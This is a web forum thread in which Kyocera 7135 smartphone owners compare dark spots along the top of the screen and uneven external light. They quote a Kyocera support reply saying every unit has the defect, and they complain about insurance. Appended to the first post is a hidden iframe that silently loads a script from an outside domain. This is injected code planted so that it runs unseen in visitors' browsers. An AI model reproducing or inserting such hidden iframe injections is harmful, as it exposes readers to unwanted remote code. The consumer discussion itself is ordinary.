+ Reply to Thread
Page 1 of 2 1 2 LastLast

Screen Blemish and External Light

I have a screen blemish the size of a half of thumb at the top of my screen. It seems to be a little darker than the rest of the screen. You can really see it when changing the contrast.

Also, my external light is darker on the left side and real bright on the right side.

Anybody else seeing this?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: Screen Blemish and External Light

Originally posted by audi
    I have a screen blemish the size of a half of thumb at the top of my screen. It seems to be a little darker than the rest of the screen. You can really see it when changing the contrast.

Also, my external light is darker on the left side and real bright on the right side.

Anybody else seeing this?
    I have heard about the "screen blemish" from one other person, but have not seen it myself on my 7135. Also, I keep my 7135 charging on my nightstand and have it facing so I can see the external screen at all times, and the lighting looks the same on both sides to me.
    Please visit my picture site: Robert-O-Rama :)

My blemish is really small and it is directly in the center top of the screen. This might have to be returned....

I have seen about six 7135's and they all seem to have a screen blemish at the top ot the screen. If you go to an app that has white at the top of the screen you will see six, count 'em, 6 darker areas. Some are darker than others. These phones are all build B2 according to the clear sticker on the boxes. It may be that the lcd screen is held in too tight by whatever device holds the LCD in. I have a few more days before my 30 day exchange is up and I will be trading phones. Especially since ALLTELL wil NOT offer insurance on this puppy. Anyone know of any other source of insurance for smart phones?

Geyer--

The insurance and Alltel's inability to get my data side to work were key factors in buying the 7135 outright and activating on Verizon's network.

I'm paying for phone insurance through verizon so hopefully if anything bad happens they will support it.

I have this dark spot too, and I don't recall seeing it when I first got the phone, but about 2-3 weeks ago when I got my i330 for the business, I was comparing the phones and noticed it.

It has been driving me nuts ever since. Was thinking of complaining about it to Kyocera and see what they thought.

Larry
    Larry Ganz
    http://www.jesusreigns.org
    John 3:16

I see six also

I have six small screen blemishs at the top of the screen also. It has been driving me crazy also, does everyone have them, if not is this grounds for an exchange from Kyocera. I've waiting for Verizon to release it and compare it to another phone. But do I only have 30 days to exchange it with Kyocera.

Re: I see six also

Originally posted by mbrahm
    I have six small screen blemishs at the top of the screen also. It has been driving me crazy also, does everyone have them, if not is this grounds for an exchange from Kyocera. I've waiting for Verizon to release it and compare it to another phone. But do I only have 30 days to exchange it with Kyocera.
    I'll look closer, but if I have anything going on like that I would hope that I would've noticed, considering how much time I spend looking at the 7135's screen! (and in lots of different lighting)

I got my response from Kyocera second tier support.

"We apologize for any problems you are experiencing with your new 7135 handset.

Per your case notes, you have described a display issue where there is a slight discoloration/dots towards the upper portion of your display when viewed at certain angles. Unfortunately, this issue resides on all of our 7135 handsets and is not limited to a specific batch of phones. Sending your handset for repair/exchange will not solve your problem. If this
    issue is unacceptable for your usage, please contact your place of purchase for a possible refund.

Thank You,
    James"

Also got a voice mail from "James @ Kyocera" in which he states that it took him a couple of hours to notice the blemishes at the top of the 7135 screen and that I should be aware that all LCD screens have defects. Only a couple of hours....what a great tech trouble shooter!!!!

It doesn't take me a couple of hours, I see it right away. Maybe because I now know they are there. I would still like to see some more phones, to make sure all phone have them. If they all do, I can leave with it, and move on.

I have seen about six phones in the field and all have the marks.

My local Alltel store went thru another six at random and they all had the marks. They called techs at another Alltel store in the area and the 7135s they checked had the marks.

Kyocera 2nd tier techs spoke to their facility in San Diego and their current equipment has the marks. They have checked manufacture dates, found under the battery after they 10-K # then a space...mine reads 305 for 2003 5th week, and found that it is not just one batch but all phones even early ones used for testing. I guess no one in "quaility" control ever used a word processor or spreadsheet or jpeg with white or sky at top of frame. Reassuring isn't it to pay all the $$ and have to tell them to maybe test 'em before selling 'em.

What irks me most is that Alltel insurance "lock/line" won't insure the phone. Lock/Line is strange in that they charge and insurance fee then $35 replacement fee and then give you a reconditioned phone. I guess if something happens I will send it to Kyocera and have it fixed and at least know that I am getting my phone back.

By the way, I have seen a few of these 7135s out of the box that have contrast probs. Even the head tech at my local Alltel store had to switch his own 7135 for contrast probs. Some out of the box when brightness slider is moved to right blackens the screen others the slider does nothing.

Is Robert the only one who doesn't see it?
    Maybe a few others who don't have the problem can speak up, and also say how long they've had the phone.

I first noticed my 7135 spots while the phone was in the cradle.
    If you hold the phone perpendicular to you eye plane the spots are minimized. Maybe we should design a level for the 7135 to aid in viewing images and spreadsheets?

Then I was showing a client some exterior pictures of one of his properties and he told me I should clean my lens as there was "dirt" in the sky. Nice huh?

Originally posted by KLiuLess
    Is Robert the only one who doesn't see it?
    Maybe a few others who don't have the problem can speak up, and also say how long they've had the phone.
    I had my first 7135 for almost 1 month. I've only had my new one for 4 days. Maybe I'm just not seeing what other people are talking about (although I have 20/20 vision with no glasses/contacts)... but I haven't noticed anything unusual on either of my 7135's. Based on what a couple people have said here, I would think that it would be particularly obvious when using the 7135 in the dark, and I haven't noticed anything then either.

I'm not saying they aren't there, but I can't find them... and if I have to look any harder than I have, then they might as well not be there even if they are there.

Somebody with this "problem" will have to give a few examples of when it's most obvious, and I can try to find them again.

I realy WANTED to see this thing guys (hated to be the only one not at the party) but I can't. I changed contrast and brightness from the Prefs-PDA/General screen hoping that the little dark spot would appear. I didn't go as far as taking off my screen protector though.

I just don't see it on mine. It must not be very noticible on some devices, right?

Originally posted by Beryl
    I realy WANTED to see this thing guys (hated to be the only one not at the party) but I can't. I changed contrast and brightness from the Prefs-PDA/General screen hoping that the little dark spot would appear. I didn't go as far as taking off my screen protector though.

I just don't see it on mine. It must not be very noticible on some devices, right?
    Let's have our own little party then Beryl

I had also upped my brightness to the max, and still couldn't see it.

What are the manufacture dates of those who don't seem to have the spots? I'm glad some of the LCD's are good. Kyocera seems to think they made them all with the "leopard" condition.

My contrast and brightness settings are set right in the middle. The only time I change them is if I'm doing night photos and then I have to dim the screen or it makes me "phone blind".

Originally posted by geyer
    My contrast and brightness settings are set right in the middle. The only time I change them is if I'm doing night photos and then I have to dim the screen or it makes me "phone blind".
    It's good to know the screen can be set that bright. Is that kinda like the squint you get when viewing a computer screen in the dark?

Yeah or like snow blindness.

If your are doing pictures of buildings at night your eyes adjust to the dark and then you flip open the phone and it is way too bright.

I use an amber led light to see the camera settings, every manufacter makes the controls black, so I can see to change settings and not have to use a bright flashlight. If you are ever in a dark place, like a hotel room at night, just flip open your 7135 and you can walk around the strange room without killling your ankles and/or toes.